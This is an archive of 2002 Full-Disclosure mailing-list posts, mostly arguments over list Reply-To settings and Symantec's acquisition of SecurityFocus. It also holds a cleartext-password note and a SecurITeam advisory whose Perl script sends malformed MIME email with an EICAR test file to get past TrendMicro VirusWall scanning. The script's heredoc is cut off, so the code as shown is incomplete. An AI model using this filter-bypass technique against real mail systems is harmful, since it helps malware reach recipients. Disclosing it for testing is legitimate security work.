http://www.caucho.com/download/index.xtp Author: Peter Gr?ndl (pgrundl at kpmg.dk) -------------------------------------------------------------------- KPMG is not responsible for the misuse of the information we provide through our security advisories. These advisories are a service to the professional security community. In no event shall KPMG be lia- ble for any consequences whatsoever arising out of or in connection with the use or spread of this information. -------------------------------------------------------------------- From dotslash at snosoft.com Wed Jul 17 13:38:20 2002 From: dotslash at snosoft.com (KF) Date: Wed, 17 Jul 2002 08:38:20 -0400 Subject: [Full-Disclosure] default list reply-to: address References: <20020716180433.G558@netsys.com> <3D34EF2C.50901@snosoft.com> <001501c22d33$7d2628b0$0a00a8c0@violetclub> Message-ID: <3D35653C.30803@snosoft.com> *grin* I think you hit the nail right on the head. I think about the only mailing lists I use are the ones from securityfocus. I shal adapt I suppose. =] -KF Roland Postle wrote: > >For what it's worth, I prefer it that way. With the exception of >securityfocus' lists, all the mailing lists I'm on do it that way. It's what >I'm used to, and, since the majority of replies go to the list not the >individual who wrote the original post, it makes sense. > > From hellnbak at nmrc.org Wed Jul 17 15:03:30 2002 From: hellnbak at nmrc.org (hellNbak) Date: Wed, 17 Jul 2002 10:03:30 -0400 (EDT) Subject: [Full-Disclosure] default list reply-to: address In-Reply-To: <20020717085641.GA18830@fishbowl.madduck.net> Message-ID: OMFG - 17 characters in the subject line wastes bandwidth? Get a grip. Your message is more of a waste of bandwidth than the extra characters in the subject line....... As far as the reply to goes, who cares? How hard is it to change the email address you are sending to? There are much bigger things to worry about than this stuff.... On Wed, 17 Jul 2002, martin f krafft wrote: > Date: Wed, 17 Jul 2002 10:56:41 +0200 > From: martin f krafft > Reply-To: full-disclosure at lists.netsys.com > To: full-disclosure at lists.netsys.com > Subject: Re: [Full-Disclosure] default list reply-to: address > > also sprach Roland Postle [2002.07.17.0344 +0200]: > > For what it's worth, I prefer it that way. With the exception of > > securityfocus' lists, all the mailing lists I'm on do it that way. It's what > > I'm used to, and, since the majority of replies go to the list not the > > individual who wrote the original post, it makes sense. > > Which is why proper mail clients handle this appropriately. In Mutt, > I press 'r' to reply to the author, 'l' to reply to the list, and 'g' > to reply to both. Obviously this breaks when Reply-To is set... > > Anyway, I give you this to read: > http://www.unicom.com/pw/reply-to-harmful.html > > > The [Full-Disclosure] in the subject (that someone else objected to) I like > > as well, but I don't have such good reasons. I just like it. > > It wastes bandwidth and doesn't add information that you couldn't add > on the client-side. I am opposed. > > -- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- "I don't intend to offend, I offend with my intent" hellNbak at nmrc.org http://www.nmrc.org/~hellnbak -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- From lwc at vapid.ath.cx Wed Jul 17 15:25:33 2002 From: lwc at vapid.ath.cx (Larry W. Cashdollar) Date: Wed, 17 Jul 2002 10:25:33 -0400 (EDT) Subject: [Full-Disclosure] TheServer cleartext password sillyness. In-Reply-To: <3D35653C.30803@snosoft.com> Message-ID: <20020717102449.J44726-100000@vapid.ath.cx> Vapid Labs Security Note A quick note on Fastlink Software's TheServer http server. I was not going to write this up since it is a silly problem but this server is listed in the netcraft survey so people are using it. TheServer is a very small and simple webserver for the Windows platform it consists of a single executable and configuration file. Problem: TheServer stores the password for log file accesss in cleartext. This password is stored in the server.ini file. Which by default resides in the servers root directory. This is a VERY simple webserver for Windows 98/95 if the server is setup to log, then the password is also sent to the logfile when accessing the server logs remotely. The risk is you can have someone else parsing your weblogs that you never intended. Vendor: http://www.fastlinksoftware.com/ Netcraft Survey: http://www.netcraft.com/Survey/servers.html Larry Cashdollar Vapid Labs http://vapid.ath.cx From mail at blazde.co.uk Wed Jul 17 16:11:57 2002 From: mail at blazde.co.uk (Roland Postle) Date: Wed, 17 Jul 2002 16:11:57 +0100 Subject: [Full-Disclosure] default list reply-to: address References: <20020716180433.G558@netsys.com> <3D34EF2C.50901@snosoft.com> <001501c22d33$7d2628b0$0a00a8c0@violetclub> Message-ID: <006101c22da4$4b810bb0$0a00a8c0@violetclub> > > The [Full-Disclosure] in the subject (that someone else objected to) I like > > as well, but I don't have such good reasons. I just like it. > > It wastes bandwidth I think you must be drunk. > Anyway, I give you this to read: > http://www.unicom.com/pw/reply-to-harmful.html There is a very good argument there, but still I can't help thinking of those HTML purists who rattle on about how blind people should be able to view your webpage if it's done properly. No matter how much they lecture us, the web won't change. And it won't be viewable properly by blind people until someone develops better tools for converting the visual content. Email's been abused for far longer than than HTML, and I can't help thinking there aren't many people who still rely on the Reply-To field to get their mail going to a different place than the From field. Perhaps that arachic functionality should move aside for the convenience of mailing lists. Also, I really hate receiving three mails everytime someone replies to one of my posts on these non Reply-To munging lists. Presumably they just hit the group reply button with no regard to the fact that my address ends up in there twice (I have no idea why twice) as well as the list address which I'm obviously subscribed to. Martin would have a fit at all that bandwidth wastage. Incidentally, does anyone have a link that tells me whether my email client is handling these GnuPG messages correctly or not? I get 2 attachments, one a text file of the message and the other the signature. I have to open the attachment to read the messages, and then I have to copy-paste and manually add '>'s if I want to reply to bits of it. Abuse of the email format we've used successfuly for decades or a lame mail client (OE)? This is all horribly off-topic. Sorry. - Blazde From ulfh at Update.UU.SE Wed Jul 17 16:29:23 2002 From: ulfh at Update.UU.SE (Ulf H{rnhammar) Date: Wed, 17 Jul 2002 17:29:23 +0200 Subject: [Full-Disclosure] default list reply-to: address In-Reply-To: <006101c22da4$4b810bb0$0a00a8c0@violetclub> References: <20020716180433.G558@netsys.com> <3D34EF2C.50901@snosoft.com> <001501c22d33$7d2628b0$0a00a8c0@violetclub> <006101c22da4$4b810bb0$0a00a8c0@violetclub> Message-ID: <20020717172923.A9254@Update.UU.SE> On Wed, Jul 17, 2002 at 04:11:57PM +0100, Roland Postle wrote: > There is a very good argument there, but still I can't help thinking of > those HTML purists who rattle on about how blind people should be able to > view your webpage if it's done properly. No matter how much they lecture us, > the web won't change. Hey, I wrote a tool to "remind" people to fix these things! It's called limegreen, it's available at http://savannah.gnu.org/projects/limegreen/ and it validates web sites with W3C's validator and complains via e-mail if the sites don't conform to the HTML specification. // Ulf Harnhammar From pauls at utdallas.edu Wed Jul 17 16:56:46 2002 From: pauls at utdallas.edu (Schmehl, Paul L) Date: Wed, 17 Jul 2002 10:56:46 -0500 Subject: [Full-Disclosure] default list reply-to: address Message-ID: <871080DEC5874D41B4E3AFC5C400611E026EEAC9@UTDEVS02.campus.ad.utdallas.edu> You won't like mine then. I used my own DOC SPEC in protest against the HTML purists who are far too snobby for my taste. Paul Schmehl (pauls at utdallas.edu) Supervisor of Support Services The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu/~pauls/ > -----Original Message----- > From: Ulf H{rnhammar [mailto:ulfh at Update.UU.SE] > Sent: Wednesday, July 17, 2002 10:29 AM > To: full-disclosure at lists.netsys.com > Subject: Re: [Full-Disclosure] default list reply-to: address > > Hey, I wrote a tool to "remind" people to fix these things! > It's called limegreen, it's available at > http://savannah.gnu.org/projects/limegreen/ > and it validates > web sites with W3C's validator and complains via e-mail if > the sites don't conform to the HTML specification. From lupe at lupe-christoph.de Wed Jul 17 19:53:02 2002 From: lupe at lupe-christoph.de (Lupe Christoph) Date: Wed, 17 Jul 2002 20:53:02 +0200 Subject: [Full-Disclosure] default list reply-to: address In-Reply-To: <871080DEC5874D41B4E3AFC5C400611E026EEAC9@UTDEVS02.campus.ad.utdallas.edu> References: <871080DEC5874D41B4E3AFC5C400611E026EEAC9@UTDEVS02.campus.ad.utdallas.edu> Message-ID: <20020717185302.GC1164@lupe-christoph.de> On Wednesday, 2002-07-17 at 10:56:46 -0500, Schmehl, Paul L wrote: > You won't like mine then. I used my own DOC SPEC in protest against the > HTML purists who are far too snobby for my taste. If I ever have a wheel to invemt, would you do it for me? :-P Lupe Christoph -- | lupe at lupe-christoph.de | http://www.lupe-christoph.de/ | | I have challenged the entire ISO-9000 quality assurance team to a | | Bat-Leth contest on the holodeck. They will not concern us again. | | http://public.logica.com/~stepneys/joke/klingon.htm | From securityguru at hushmail.com Wed Jul 17 21:38:34 2002 From: securityguru at hushmail.com (securityguru at hushmail.com) Date: Wed, 17 Jul 2002 13:38:34 -0700 Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others.... Message-ID: <200207172038.g6HKcYg44082@mailserver2.hushmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 FYI Symantec to Acquire SecurityFocus Offers Most Complete Security Early Warning System Available CUPERTINO, Calif. - July 17, 2002 - Symantec Corp. (Nasdaq: SYMC) today announced the acquisition of SecurityFocus for approximately US$75 million in cash. With this acquisition, Symantec will offer customers the most comprehensive, proactive early warning system across the broadest range of threats. The transaction is expected to close by early to mid-August 2002. "SecurityFocus has established the most respected security community and developed one of the leading early warning systems for customers around the world," said John W. Thompson, Symantec chairman and chief executive officer. "This acquisition will broaden Symantec's leadership in Internet security response with the addition of the world's first global threat management system, the most complete vulnerability database and customizable alert services." "We have developed our global threat management systems to provide customers with timely and actionable information relevant to their individual networks," said Arthur Wong, SecurityFocus co-founder and chief executive officer. "Combined with Symantec's world-class antivirus expertise, industry-leading intrusion detection solutions and back-end infrastructure, we can rapidly deploy the most comprehensive threat management solutions to our global customers worldwide." SecurityFocus has developed the world's most comprehensive and up-to-date database of vulnerabilities available. Symantec will continue to license the Vulnerability Database to security product vendors, managed service providers and other organizations that use it to create powerful new security products and services for their customers. In addition, Symantec will continue to manage the Bugtraq mailing list and the online security community under the SecurityFocus brand. It will continue to offer a forum for objective reporting by security experts on the latest IT threats and attacks as well as how to prevent security breaches. Symantec will also leverage the DeepSight line of global threat management solutions. The DeepSight Threat Management System provides early warning of attacks along with specific threat and patch information allowing companies to proactively protect their networks. More than 15,000 partners in more than 175 countries are registered to automatically provide a constant stream of security data that is correlated and analyzed to identify active attacks. DeepSight Analyzer gives IT professionals the ability to track and manage incidents on their own networks by automatically correlating attacks from a multitude of intrusion detection solutions. The product manages threats by comparing incidents on their network against the Vulnerability Database, tracking attacks to resolution and generating statistical incident reports. Using information about suspicious network traffic and intrusions submitted by anonymous users, SecurityFocus identifies patterns in attacks that help serve as a threat-gauging system for the Internet community. By monitoring almost 11,000 distinct versions of more than 2,700 products from 1,300 vendors, SecurityFocus provides proactive, customized alert services for environment-specific vulnerabilities and malicious code alerts. DeepSight Alert Services can be configured to ensure that customers receive only alerts that are relevant to their networks, enabling them to deploy patches or work-arounds before vulnerabilities can be exploited. -----BEGIN PGP SIGNATURE----- Version: Hush 2.1 Note: This signature can be verified at https://www.hushtools.com wmEEARECACEFAj011XAaHHNlY3VyaXR5Z3VydUBodXNobWFpbC5jb20ACgkQns+IF5jR p67CuACgr7I8ULyDUiIpD59Td9t8FZSw17wAoIbpaURMGZ7PBkZtnQ0Yxub/W0hW =LmOt -----END PGP SIGNATURE----- Communicate in total privacy. Get your free encrypted email at https://www.hushmail.com/?l=2 Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople From core at bokeoa.com Wed Jul 17 22:07:08 2002 From: core at bokeoa.com (Charles 'core' Stevenson) Date: Wed, 17 Jul 2002 15:07:08 -0600 Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others.... References: <200207172038.g6HKcYg44082@mailserver2.hushmail.com> Message-ID: <3D35DC7C.4050401@bokeoa.com> Isn't it great how the community is so nice in supporting the exploitation and misuse of proprietary exploit source code to further the large companies for-profit endeavours? peace, core securityguru at hushmail.com wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > FYI > > Symantec to Acquire SecurityFocus > > Offers Most Complete Security Early Warning System Available > > CUPERTINO, Calif. - July 17, 2002 - Symantec Corp. (Nasdaq: SYMC) today announced the acquisition of SecurityFocus for approximately US$75 million in cash. With this acquisition, Symantec will offer customers the most comprehensive, proactive early warning system across the broadest range of threats. The transaction is expected to close by early to mid-August 2002. > > "SecurityFocus has established the most respected security community and developed one of the leading early warning systems for customers around the world," said John W. Thompson, Symantec chairman and chief executive officer. "This acquisition will broaden Symantec's leadership in Internet security response with the addition of the world's first global threat management system, the most complete vulnerability database and customizable alert services." > > "We have developed our global threat management systems to provide customers with timely and actionable information relevant to their individual networks," said Arthur Wong, SecurityFocus co-founder and chief executive officer. "Combined with Symantec's world-class antivirus expertise, industry-leading intrusion detection solutions and back-end infrastructure, we can rapidly deploy the most comprehensive threat management solutions to our global customers worldwide." > > SecurityFocus has developed the world's most comprehensive and up-to-date database of vulnerabilities available. Symantec will continue to license the Vulnerability Database to security product vendors, managed service providers and other organizations that use it to create powerful new security products and services for their customers. > > In addition, Symantec will continue to manage the Bugtraq mailing list and the online security community under the SecurityFocus brand. It will continue to offer a forum for objective reporting by security experts on the latest IT threats and attacks as well as how to prevent security breaches. > > Symantec will also leverage the DeepSight line of global threat management solutions. The DeepSight Threat Management System provides early warning of attacks along with specific threat and patch information allowing companies to proactively protect their networks. More than 15,000 partners in more than 175 countries are registered to automatically provide a constant stream of security data that is correlated and analyzed to identify active attacks. > > DeepSight Analyzer gives IT professionals the ability to track and manage incidents on their own networks by automatically correlating attacks from a multitude of intrusion detection solutions. The product manages threats by comparing incidents on their network against the Vulnerability Database, tracking attacks to resolution and generating statistical incident reports. Using information about suspicious network traffic and intrusions submitted by anonymous users, SecurityFocus identifies patterns in attacks that help serve as a threat-gauging system for the Internet community. > > By monitoring almost 11,000 distinct versions of more than 2,700 products from 1,300 vendors, SecurityFocus provides proactive, customized alert services for environment-specific vulnerabilities and malicious code alerts. DeepSight Alert Services can be configured to ensure that customers receive only alerts that are relevant to their networks, enabling them to deploy patches or work-arounds before vulnerabilities can be exploited. > -----BEGIN PGP SIGNATURE----- > Version: Hush 2.1 > Note: This signature can be verified at https://www.hushtools.com > > wmEEARECACEFAj011XAaHHNlY3VyaXR5Z3VydUBodXNobWFpbC5jb20ACgkQns+IF5jR > p67CuACgr7I8ULyDUiIpD59Td9t8FZSw17wAoIbpaURMGZ7PBkZtnQ0Yxub/W0hW > =LmOt > -----END PGP SIGNATURE----- > > > Communicate in total privacy. > Get your free encrypted email at https://www.hushmail.com/?l=2 > > Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople > > _______________________________________________ > Full-Disclosure - We believe in it. > Full-Disclosure at lists.netsys.com > http://lists.netsys.com/mailman/listinfo/full-disclosure > > From steve at entrenchtech.com Wed Jul 17 22:01:51 2002 From: steve at entrenchtech.com (Steve) Date: Wed, 17 Jul 2002 15:01:51 -0600 Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others.... References: <200207172038.g6HKcYg44082@mailserver2.hushmail.com> <3D35DC7C.4050401@bokeoa.com> Message-ID: <00fd01c22dd5$2c2436d0$f954b8a1@entrenchtech.com> I hate to say this guys but with all due respect: I told you so! Steve Manzuik Moderator - VulnWatch www.vulnwatch.org ----- Original Message ----- From: "Charles 'core' Stevenson" To: Sent: Wednesday, July 17, 2002 3:07 PM Subject: Re: [Full-Disclosure] Symantec Buys SecurityFocus, among others.... > Isn't it great how the community is so nice in supporting the > exploitation and misuse of proprietary exploit source code to further > the large companies for-profit endeavours? > > peace, > core > > securityguru at hushmail.com wrote: > > -----BEGIN PGP SIGNED MESSAGE----- > > Hash: SHA1 > > > > FYI > > > > Symantec to Acquire SecurityFocus > > > > Offers Most Complete Security Early Warning System Available > > > > CUPERTINO, Calif. - July 17, 2002 - Symantec Corp. (Nasdaq: SYMC) today announced the acquisition of SecurityFocus for approximately US$75 million in cash. With this acquisition, Symantec will offer customers the most comprehensive, proactive early warning system across the broadest range of threats. The transaction is expected to close by early to mid-August 2002. > > > > "SecurityFocus has established the most respected security community and developed one of the leading early warning systems for customers around the world," said John W. Thompson, Symantec chairman and chief executive officer. "This acquisition will broaden Symantec's leadership in Internet security response with the addition of the world's first global threat management system, the most complete vulnerability database and customizable alert services." > > > > "We have developed our global threat management systems to provide customers with timely and actionable information relevant to their individual networks," said Arthur Wong, SecurityFocus co-founder and chief executive officer. "Combined with Symantec's world-class antivirus expertise, industry-leading intrusion detection solutions and back-end infrastructure, we can rapidly deploy the most comprehensive threat management solutions to our global customers worldwide." > > > > SecurityFocus has developed the world's most comprehensive and up-to-date database of vulnerabilities available. Symantec will continue to license the Vulnerability Database to security product vendors, managed service providers and other organizations that use it to create powerful new security products and services for their customers. > > > > In addition, Symantec will continue to manage the Bugtraq mailing list and the online security community under the SecurityFocus brand. It will continue to offer a forum for objective reporting by security experts on the latest IT threats and attacks as well as how to prevent security breaches. > > > > Symantec will also leverage the DeepSight line of global threat management solutions. The DeepSight Threat Management System provides early warning of attacks along with specific threat and patch information allowing companies to proactively protect their networks. More than 15,000 partners in more than 175 countries are registered to automatically provide a constant stream of security data that is correlated and analyzed to identify active attacks. > > > > DeepSight Analyzer gives IT professionals the ability to track and manage incidents on their own networks by automatically correlating attacks from a multitude of intrusion detection solutions. The product manages threats by comparing incidents on their network against the Vulnerability Database, tracking attacks to resolution and generating statistical incident reports. Using information about suspicious network traffic and intrusions submitted by anonymous users, SecurityFocus identifies patterns in attacks that help serve as a threat-gauging system for the Internet community. > > > > By monitoring almost 11,000 distinct versions of more than 2,700 products from 1,300 vendors, SecurityFocus provides proactive, customized alert services for environment-specific vulnerabilities and malicious code alerts. DeepSight Alert Services can be configured to ensure that customers receive only alerts that are relevant to their networks, enabling them to deploy patches or work-arounds before vulnerabilities can be exploited. > > -----BEGIN PGP SIGNATURE----- > > Version: Hush 2.1 > > Note: This signature can be verified at https://www.hushtools.com > > > > wmEEARECACEFAj011XAaHHNlY3VyaXR5Z3VydUBodXNobWFpbC5jb20ACgkQns+IF5jR > > p67CuACgr7I8ULyDUiIpD59Td9t8FZSw17wAoIbpaURMGZ7PBkZtnQ0Yxub/W0hW > > =LmOt > > -----END PGP SIGNATURE----- > > > > > > Communicate in total privacy. > > Get your free encrypted email at https://www.hushmail.com/?l=2 > > > > Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Full-Disclosure at lists.netsys.com > > http://lists.netsys.com/mailman/listinfo/full-disclosure > > > > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Full-Disclosure at lists.netsys.com > http://lists.netsys.com/mailman/listinfo/full-disclosure From securityguru at hushmail.com Wed Jul 17 23:08:37 2002 From: securityguru at hushmail.com (securityguru at hushmail.com) Date: Wed, 17 Jul 2002 15:08:37 -0700 Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others.. .. Message-ID: <200207172208.g6HM8b358256@mailserver2.hushmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 WTF???? First SecurityFocus makes cash off of things they get for FREE, then all those guys get rich by selling out to Symantec. Symantec, of course, claims they will maintain the same integrity as SecurityFocus did. If that's the case, we've got problems...where's my $$$$? >>>-----Original Message----- >>>From: Charles 'core' Stevenson [mailto:core at bokeoa.com] >>>Sent: Wednesday, July 17, 2002 5:07 PM >>>To: full-disclosure at lists.netsys.com >>>Subject: Re: [Full-Disclosure] Symantec Buys SecurityFocus, among >>>others.... >>> >>> >>>Isn't it great how the community is so nice in supporting the >>>exploitation and misuse of proprietary exploit source code to further >>>the large companies for-profit endeavours? >>> >>>peace, >>>core -----BEGIN PGP SIGNATURE----- Version: Hush 2.1 Note: This signature can be verified at https://www.hushtools.com wmEEARECACEFAj016osaHHNlY3VyaXR5Z3VydUBodXNobWFpbC5jb20ACgkQns+IF5jR p65BngCgtqWVUTwI6zYMNnUgFB1RdR5YVSgAn07vaZZjV1m65MMzWsI4luD6h0VT =7p8Q -----END PGP SIGNATURE----- Communicate in total privacy. Get your free encrypted email at https://www.hushmail.com/?l=2 Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople From mfrd at attitudex.com Wed Jul 17 23:32:38 2002 From: mfrd at attitudex.com (Muhammad Faisal Rauf Danka) Date: Wed, 17 Jul 2002 15:32:38 -0700 (PDT) Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others.. Message-ID: <20020717223238.A37D136F9@sitemail.everyone.net> An embedded and charset-unspecified text was scrubbed... Name: not available Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020717/a1a036b0/attachment.ksh From len at netsys.com Thu Jul 18 00:31:03 2002 From: len at netsys.com (Len Rose) Date: Wed, 17 Jul 2002 19:31:03 -0400 Subject: [Full-Disclosure] update on solaris 9 playpen Message-ID: <20020717193103.M14259@netsys.com> I've gotten a few notes from folks, and we're going to go ahead with the project. I'm building the server, it will take awhile to get it completed and delivered to a colocation facility. More news when the above has been completed. Len From dotslash at snosoft.com Thu Jul 18 06:07:19 2002 From: dotslash at snosoft.com (KF) Date: Wed, 17 Jul 2002 22:07:19 -0700 Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others.. .. References: <200207172208.g6HM8b358256@mailserver2.hushmail.com> Message-ID: <3D364D07.2090909@snosoft.com> don't try to ask any vendors for cash ... some of them try to bite. -KF securityguru at hushmail.com wrote: >-----BEGIN PGP SIGNED MESSAGE----- >Hash: SHA1 > >WTF???? First SecurityFocus makes cash off of things they get for FREE, then all those guys get rich by selling out to Symantec. Symantec, of course, claims they will maintain the same integrity as SecurityFocus did. If that's the case, we've got problems...where's my $$$$? > > From noamr at beyondsecurity.com Thu Jul 18 12:41:22 2002 From: noamr at beyondsecurity.com (Noam Rathaus) Date: Thu, 18 Jul 2002 13:41:22 +0200 Subject: [Full-Disclosure] TrendMicro's VirusWall Space Gap (Exploit) Message-ID: <08ff01c22e50$0b5dc030$2200a8c0@noambs> This advisory can be viewed online, and will be updated regularly at: http://www.securiteam.com/exploits/5DP0A2A7QC.html ----- Title: TrendMicro's VirusWall Space Gap (Exploit) Summary As we reported in our previous article: TrendMicro's VirusWall Space Gap (Virus Protection Bypassing) , a security vulnerability in TrendMicro's VirusWall allows remote attackers to bypass its defense and insert a malicious virus though the VirusWall. The following is an exploit code that can be used to test for this vulnerability. Details: Vulnerable systems: * TrendMicro's VirusWall version 3.52 build 1375 (or any other build prior to 1462) Immune systems: * TrendMicro's VirusWall version 3.52 build 1462 * TrendMicro's VirusWall version 5.1 (Allows stopping of malformed emails, not enabled by default) CVE: CAN-2002-0637 Exploit: #!/usr/bin/perl # The following code generates a malformed email with an EICAR attachment (False Virus). # The vulnerability has been found to be present in TrendMicro's VirusWall, and has been now patched. # Refer to http://solutionbank.antivirus.com/solutions/solutionsearch.asp solution ID 11948 # # BeyondSecurity's SecurITeam, Copyrighted Material, for Testing Purposes only. For more information see: # http://www.securiteam.com/securitynews/5KP000A7QE.html use Getopt::Std; use IO::Socket::INET; getopt('tfhvsb'); if (!$opt_f || !$opt_t || !$opt_h) { print "Usage: malformed_email.pl <-t to> <-f from> <-h smtphost> [-v variant] [-s subject] [-b text]\nVariants:\n(1) Content-Type\n(2) Content Transfer Encoding\n(3) Boundary Space (trailing)\n(4) Boundary Space (prefix)\n"; exit; } $sock = IO::Socket::INET->new(PeerAddr => "$opt_h",PeerPort => '25', Proto => 'tcp'); unless (<$sock> =~ "220") { die "Not a SMTP Server?" } print $sock "HELO you\r\n"; unless (<$sock> =~ "250") { die "HELO failed" } print $sock "MAIL FROM:<$opt_f>\r\n"; unless (<$sock> =~ "250") { die "MAIL FROM failed" } print $sock "RCPT TO:<$opt_t>\r\n"; unless (<$sock> =~ "250") { die "RCPT TO failed" } print $sock "DATA\r\n"; unless (<$sock> =~ "354") { die "DATA failed" } if ($opt_v eq "1") { $content_type = "Content-Type :"; } else { $content_type = "Content-Type:"; } if ($opt_v eq "2") { $content_transfer_encoding = "Content-Transfer-Encoding :"; } else { $content_transfer_encoding = "Content-Transfer-Encoding:"; } if ($opt_v eq "3") { $boundary = "boundary=----=_NextPart_000_000E_01C2100B.F369D840 "; } else { if ($opt_v eq "4") { $boundary = "boundary= ----=_NextPart_000_000E_01C2100B.F369D840"; } else { $boundary = "boundary=\"----=_NextPart_000_000E_01C2100B.F369D840\""; } } print $sock <; print "$a\n"; close($sock); Additional Information: The information has been provided by SecurITeam Experts. ----- Thanks Noam Rathaus CTO Beyond Security Ltd. http://www.BeyondSecurity.com http://www.SecuriTeam.com From hggdh at attbi.com Thu Jul 18 14:39:37 2002 From: hggdh at attbi.com (HggdH) Date: Thu, 18 Jul 2002 07:39:37 -0600 Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others.. References: <20020717223238.A37D136F9@sitemail.everyone.net> Message-ID: <004501c22e60$8fc33bb0$3264a8c0@local> From: "Muhammad Faisal Rauf Danka" Sent: Wednesday, July 17, 2002 16:32 Subject: Re: [Full-Disclosure] Symantec Buys SecurityFocus, among others.. (snip) . I mean what do they mean by the vulnerabilities they find ? I think we are talking about two different things here -- vulnerabilities reported via BUGTRAQ, and vulnerabilities found elsewhere (internal research, priviledged access, whatever). Vulnerabilities reported via BUGTRAQ will still be published on BUGTRAQ, in the same timely way it has always been. The others... they might take longer to make it to BUGTRAQ. This is actually not different from what most of those here (us?) do -- when we receive priviledged information on a vulnerability (or when we find one), most of us will maintain secrecy for some time -- so that we can contact the vendor, work out a bypass, play of being a black hat, whatever. At least, we will NOT publish it until we can verify it's authenticity. . What they do is just moderate the damn list, and stop slipping useful . vulnerability details about Microsoft and alike.. wtf? Hold the fire, folks. Make sure it is an enemy you are firing on. Give them time. Symantec is a business, yes, but being a business is not identical to being stupid. The value of BUGTRAQ lies in it's history of being fair. Elias, and now Dave, have always done a very good job on the moderation. We may not always agree with them (I myself have had -- under other encarnations -- difference on points of view with Elias), but it is their right, since they are the moderators. (snip) . looks like another one bites the dust. Again, please remember -- if Symantec decides to censor BUGTRAQ... they will have killed it in a more effective way than any other. BUGTRAQ is followed not because it is SecurityFocus, but because it is BUGTRAQ. If BUGTRAQ will bite the dust, or not, will (hopefully) depend on what Symantec forces in. I certainly hope it will not die because of what one thinks it is, or is not. This would be pure prejudice. ..hggdh.. From emoyle at scsnet.csc.com Thu Jul 18 14:58:03 2002 From: emoyle at scsnet.csc.com (Ed Moyle) Date: Thu, 18 Jul 2002 09:58:03 -0400 Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others.. Message-ID: <3BD76687A1CBD74097E37CB67263AE973559AD@scsetbmail.scsnet.csc.com> On Thursday, July 18, 2002 09:40, HggdH [mailto:hggdh at attbi.com] wrote: > Again, please remember -- if Symantec decides to censor BUGTRAQ... they will > have killed it in a more effective way than any other. BUGTRAQ is followed > not because it is SecurityFocus, but because it is BUGTRAQ. If BUGTRAQ will > bite the dust, or not, will (hopefully) depend on what Symantec forces in. I > certainly hope it will not die because of what one thinks it is, or is not. > This would be pure prejudice. In my humble opinion, it seems like it could be a major conflict of interest to have the primary vulnerability reporting outlet controlled by a party who also makes vulnerability scanning and intrusion detections products. This has always been the case under SF, but it is *really* bad now. Note that Symantec also announced purchases of Riptech and Recourse yesterday. It would seem that Symantec would have an edge in updating their product line before competitors have a chance to update theirs... Also, not to be cynical but they have an economic incentive to "play games" with vulnerabilities reported through outlets they control (keep in mind that there are no guarantees about timeliness with respect to when the moderator must act on messages.) I'm not saying they would do this; I'm just saying that they would have economic incentive to do so. Throughout the years, I have always used BugTraq as a means to "give back" to the community; I do not appreciate my gift of free research to the community being used to make other people money. Something needs to be done. Hopefully, this list is the answer. -E From pauls at utdallas.edu Thu Jul 18 15:49:53 2002 From: pauls at utdallas.edu (Schmehl, Paul L) Date: Thu, 18 Jul 2002 09:49:53 -0500 Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others.. Message-ID: <871080DEC5874D41B4E3AFC5C400611E026EEF47@UTDEVS02.campus.ad.utdallas.edu> Does anyone here think NTBUGTRAQ is a better list since TruSecure bought it? The same will happen to bugtraq. Mark my words. The launching of this list could not have been more timely. Paul Schmehl (pauls at utdallas.edu) Supervisor of Support Services The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu/~pauls/ From hellnbak at nmrc.org Thu Jul 18 18:01:24 2002 From: hellnbak at nmrc.org (hellNbak) Date: Thu, 18 Jul 2002 13:01:24 -0400 (EDT) Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others.. In-Reply-To: <871080DEC5874D41B4E3AFC5C400611E026EEF47@UTDEVS02.campus.ad.utdallas.edu> Message-ID: NTBugtraq started sliding down hill long before TruSecure bought it. Russ' ego is what dragged that list down, and TruSecure bought into the whole seurgen general BS and fed it even more. On Thu, 18 Jul 2002, Schmehl, Paul L wrote: > Date: Thu, 18 Jul 2002 09:49:53 -0500 > From: "Schmehl, Paul L" > Reply-To: full-disclosure at lists.netsys.com > To: full-disclosure at lists.netsys.com > Subject: RE: [Full-Disclosure] Symantec Buys SecurityFocus, among others.. > > Does anyone here think NTBUGTRAQ is a better list since TruSecure bought > it? The same will happen to bugtraq. Mark my words. The launching of > this list could not have been more timely. > > Paul Schmehl (pauls at utdallas.edu) > Supervisor of Support Services > The University of Texas at Dallas > AVIEN Founding Member > http://www.utdallas.edu/~pauls/ > _______________________________________________ > Full-Disclosure - We believe in it. > Full-Disclosure at lists.netsys.com > http://lists.netsys.com/mailman/listinfo/full-disclosure > -- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- "I don't intend to offend, I offend with my intent" hellNbak at nmrc.org http://www.nmrc.org/~hellnbak -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- From core at bokeoa.com Thu Jul 18 21:56:52 2002 From: core at bokeoa.com (Charles 'core' Stevenson) Date: Thu, 18 Jul 2002 14:56:52 -0600 Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others.... References: Message-ID: <3D372B94.5050905@bokeoa.com> Jay, > Perhaps the best way to beat these cash hounds at their own game > is to start using a strictly not-for-profit licensing on all released > 